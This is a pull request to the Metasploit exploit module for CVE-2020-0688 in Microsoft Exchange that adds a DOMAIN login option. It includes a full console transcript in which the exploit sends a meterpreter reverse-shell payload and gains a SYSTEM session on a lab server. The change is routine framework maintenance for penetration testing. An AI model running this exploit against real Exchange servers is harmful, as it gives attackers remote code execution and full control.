### PR TITLE
Add the DOMAIN option to the CVE-2020-0688 Exploit

### DIFF
--- a/documentation/modules/exploit/windows/http/exchange_ecp_viewstate.md
+++ b/documentation/modules/exploit/windows/http/exchange_ecp_viewstate.md
@@ -31,6 +31,10 @@ encoded which increases the size as well. The .NET deserialization used is the
 
 ## Options
 
+### DOMAIN
+
+The authentication realm for the corresponding `USERNAME` argument
+
 ### USERNAME
 
 Username to log in with
@@ -43,66 +47,68 @@ Password to log in with
 
 ### Exchange 2016 on Server 2012 x64
 
-  For example:
+For example:
 
-    msf5 > use exploit/windows/http/exchange_ecp_viewstate
-    msf5 exploit(windows/http/exchange_ecp_viewstate) > set RHOSTS 192.168.159.129
-    RHOSTS => 192.168.159.129
-    msf5 exploit(windows/http/exchange_ecp_viewstate) > set USERNAME msflab.local\\jdoe
-    USERNAME => msflab.local\jdoe
-    msf5 exploit(windows/http/exchange_ecp_viewstate) > set PASSWORD Password1
-    PASSWORD => Password1
-    msf5 exploit(windows/http/exchange_ecp_viewstate) > set TARGET 1
-    TARGET => 1
-    msf5 exploit(windows/http/exchange_ecp_viewstate) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
-    PAYLOAD => windows/x64/meterpreter/reverse_tcp
-    msf5 exploit(windows/http/exchange_ecp_viewstate) > set LHOST 192.168.159.128
-    LHOST => 192.168.159.128
-    msf5 exploit(windows/http/exchange_ecp_viewstate) > exploit
-    
-    [*] Started reverse TCP handler on 192.168.159.128:4444 
-    [*] Command Stager progress -   3.61% done (449/12424 bytes)
-    [*] Command Stager progress -   7.23% done (898/12424 bytes)
-    [*] Command Stager progress -  10.84% done (1347/12424 bytes)
-    [*] Command Stager progress -  14.46% done (1796/12424 bytes)
-    [*] Command Stager progress -  18.07% done (2245/12424 bytes)
-    [*] Command Stager progress -  21.68% done (2694/12424 bytes)
-    [*] Command Stager progress -  25.30% done (3143/12424 bytes)
-    [*] Command Stager progress -  28.91% done (3592/12424 bytes)
-    [*] Command Stager progress -  32.53% done (4041/12424 bytes)
-    [*] Command Stager progress -  36.14% done (4490/12424 bytes)
-    [*] Command Stager progress -  39.75% done (4939/12424 bytes)
-    [*] Command Stager progress -  43.37% done (5388/12424 bytes)
-    [*] Command Stager progress -  46.98% done (5837/12424 bytes)
-    [*] Command Stager progress -  50.60% done (6286/12424 bytes)
-    [*] Command Stager progress -  54.21% done (6735/12424 bytes)
-    [*] Command Stager progress -  57.82% done (7184/12424 bytes)
-    [*] Command Stager progress -  61.44% done (7633/12424 bytes)
-    [*] Command Stager progress -  65.05% done (8082/12424 bytes)
-    [*] Command Stager progress -  68.67% done (8531/12424 bytes)
-    [*] Command Stager progress -  72.28% done (8980/12424 bytes)
-    [*] Command Stager progress -  75.89% done (9429/12424 bytes)
-    [*] Command Stager progress -  79.51% done (9878/12424 bytes)
-    [*] Command Stager progress -  82.74% done (10279/12424 bytes)
-    [*] Command Stager progress -  86.15% done (10703/12424 bytes)
-    [*] Command Stager progress -  89.43% done (11111/12424 bytes)
-    [*] Command Stager progress -  92.91% done (11543/12424 bytes)
-    [*] Command Stager progress -  96.28% done (11962/12424 bytes)
-    [*] Sending stage (206403 bytes) to 192.168.159.129
-    [*] Command Stager progress -  99.84% done (12404/12424 bytes)
-    [*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.129:17626) at 2020-03-02 10:40:52 -0500
-    [*] Command Stager progress - 100.00% done (12424/12424 bytes)
-    
-    meterpreter > getuid
-    Server username: NT AUTHORITY\SYSTEM
-    meterpreter > sysinfo
-    Computer        : EXCHANGE
-    OS              : Windows 2012 R2 (6.3 Build 9600).
-    Architecture    : x64
-    System Language : en_US
-    Domain          : MSFLAB
-    Logged On Users : 9
-    Meterpreter     : x64/windows
-    meterpreter > 
+```
+msf5 > use exploit/windows/http/exchange_ecp_viewstate
+msf5 exploit(windows/http/exchange_ecp_viewstate) > set RHOSTS 192.168.159.129
+RHOSTS => 192.168.159.129
+msf5 exploit(windows/http/exchange_ecp_viewstate) > set USERNAME msflab.local\\jdoe
+USERNAME => msflab.local\jdoe
+msf5 exploit(windows/http/exchange_ecp_viewstate) > set PASSWORD Password1
+PASSWORD => Password1
+msf5 exploit(windows/http/exchange_ecp_viewstate) > set TARGET 1
+TARGET => 1
+msf5 exploit(windows/http/exchange_ecp_viewstate) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
+PAYLOAD => windows/x64/meterpreter/reverse_tcp
+msf5 exploit(windows/http/exchange_ecp_viewstate) > set LHOST 192.168.159.128
+LHOST => 192.168.159.128
+msf5 exploit(windows/http/exchange_ecp_viewstate) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] Command Stager progress -   3.61% done (449/12424 bytes)
+[*] Command Stager progress -   7.23% done (898/12424 bytes)
+[*] Command Stager progress -  10.84% done (1347/12424 bytes)
+[*] Command Stager progress -  14.46% done (1796/12424 bytes)
+[*] Command Stager progress -  18.07% done (2245/12424 bytes)
+[*] Command Stager progress -  21.68% done (2694/12424 bytes)
+[*] Command Stager progress -  25.30% done (3143/12424 bytes)
+[*] Command Stager progress -  28.91% done (3592/12424 bytes)
+[*] Command Stager progress -  32.53% done (4041/12424 bytes)
+[*] Command Stager progress -  36.14% done (4490/12424 bytes)
+[*] Command Stager progress -  39.75% done (4939/12424 bytes)
+[*] Command Stager progress -  43.37% done (5388/12424 bytes)
+[*] Command Stager progress -  46.98% done (5837/12424 bytes)
+[*] Command Stager progress -  50.60% done (6286/12424 bytes)
+[*] Command Stager progress -  54.21% done (6735/12424 bytes)
+[*] Command Stager progress -  57.82% done (7184/12424 bytes)
+[*] Command Stager progress -  61.44% done (7633/12424 bytes)
+[*] Command Stager progress -  65.05% done (8082/12424 bytes)
+[*] Command Stager progress -  68.67% done (8531/12424 bytes)
+[*] Command Stager progress -  72.28% done (8980/12424 bytes)
+[*] Command Stager progress -  75.89% done (9429/12424 bytes)
+[*] Command Stager progress -  79.51% done (9878/12424 bytes)
+[*] Command Stager progress -  82.74% done (10279/12424 bytes)
+[*] Command Stager progress -  86.15% done (10703/12424 bytes)
+[*] Command Stager progress -  89.43% done (11111/12424 bytes)
+[*] Command Stager progress -  92.91% done (11543/12424 bytes)
+[*] Command Stager progress -  96.28% done (11962/12424 bytes)
+[*] Sending stage (206403 bytes) to 192.168.159.129
+[*] Command Stager progress -  99.84% done (12404/12424 bytes)
+[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.129:17626) at 2020-03-02 10:40:52 -0500
+[*] Command Stager progress - 100.00% done (12424/12424 bytes)
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : EXCHANGE
+OS              : Windows 2012 R2 (6.3 Build 9600).
+Architecture    : x64
+System Language : en_US
+Domain          : MSFLAB
+Logged On Users : 9
+Meterpreter     : x64/windows
+meterpreter > 
+```
 
 [1]: https://github.com/pwntester/ysoserial.net

--- a/modules/exploits/windows/http/exchange_ecp_viewstate.rb
+++ b/modules/exploits/windows/http/exchange_ecp_viewstate.rb
@@ -58,8 +58,9 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options([
       Opt::RPORT(443),
       OptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]),
-      OptString.new('USERNAME',  [ true, 'Username to authenticate as', '' ]),
-      OptString.new('PASSWORD',  [ true, 'The password to authenticate with' ])
+      OptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]),
+      OptString.new('PASSWORD', [ true, 'The password to authenticate with' ]),
+      OptString.new('DOMAIN', [ false, 'The domain to use for authentication', '' ])
     ])
 
     register_advanced_options([
@@ -147,7 +148,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'password'    => datastore['PASSWORD'],
         'flags'       => '4',
         'destination' => full_uri(normalize_uri(target_uri.path, 'owa'), vhost_uri: true),
-        'username'    => datastore['USERNAME']
+        'username'    => username
       }
     })
     fail_with(Failure::Unreachable, 'The initial HTTP request to the server failed') if res.nil?
@@ -181,5 +182,13 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status("Recovered the ASP.NET_SessionID: #{session_id}")
 
     {user_agent: user_agent, cookies: cookies, viewstate: viewstate, viewstate_generator: viewstate_generator, session_id: session_id}
+  end
+
+  def username
+    if datastore['DOMAIN'].blank?
+      datastore['USERNAME']
+    else
+      [ datastore['DOMAIN'], datastore['USERNAME'] ].join('\\')
+    end
   end
 end


### PR DESCRIPTION
This updates the `exploit/windows/http/exchange_ecp_viewstate` exploit module for CVE-2020-0688 to add the `DOMAIN` datastore option for consistency with other Metasploit modules. Originally, it was expected that the username would just be in the format of `domain\username` and it can still be done that way, however this adds an explicit option for specifying the domain. This hopefully makes it a bit more clear to the users.

## Verification

- [x] Start `msfconsole`
- [x] Run: `use exploit/windows/http/exchange_ecp_viewstate`
- [x] Set the `RHOSTS`, `RPORT` and `SSL` options as appropriate
- [x] Set the `DOMAIN`, `USERNAME` and `PASSWORD` options to a valid account with OWA acccess
- [x] Run the module, and see it work correctly

## Example

The following example demonstrates this functionality by first using an incorrect domain (`EXCHG111`) which causes the module's `check` method to fail, and then using the correct domain (`EXCHG`) it completes successfully.

```
msf6 exploit(windows/http/exchange_ecp_viewstate) > show options 

Module options (exploit/windows/http/exchange_ecp_viewstate):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DOMAIN                      no        The domain to use for authentication
   PASSWORD                    yes       The password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.159.53   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The base path to the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME                    yes       Username to authenticate as
   VHOST                       no        HTTP server virtual host


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.250.87   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Windows (x64)


msf6 exploit(windows/http/exchange_ecp_viewstate) > set DOMAIN EXCHG111
DOMAIN => EXCHG111
msf6 exploit(windows/http/exchange_ecp_viewstate) > set USERNAME alice
USERNAME => alice
msf6 exploit(windows/http/exchange_ecp_viewstate) > set PASSWORD Password1
PASSWORD => Password1
msf6 exploit(windows/http/exchange_ecp_viewstate) > check

[-] Exploit aborted due to failure: unexpected-reply: Failed to get the __VIEWSTATEGENERATOR page
[-] 192.168.159.53:443 - Check failed: The state could not be determined.
msf6 exploit(windows/http/exchange_ecp_viewstate) > set DOMAIN EXCHG
DOMAIN => EXCHG
msf6 exploit(windows/http/exchange_ecp_viewstate) > check
[+] 192.168.159.53:443 - The target is vulnerable.
msf6 exploit(windows/http/exchange_ecp_viewstate) >
```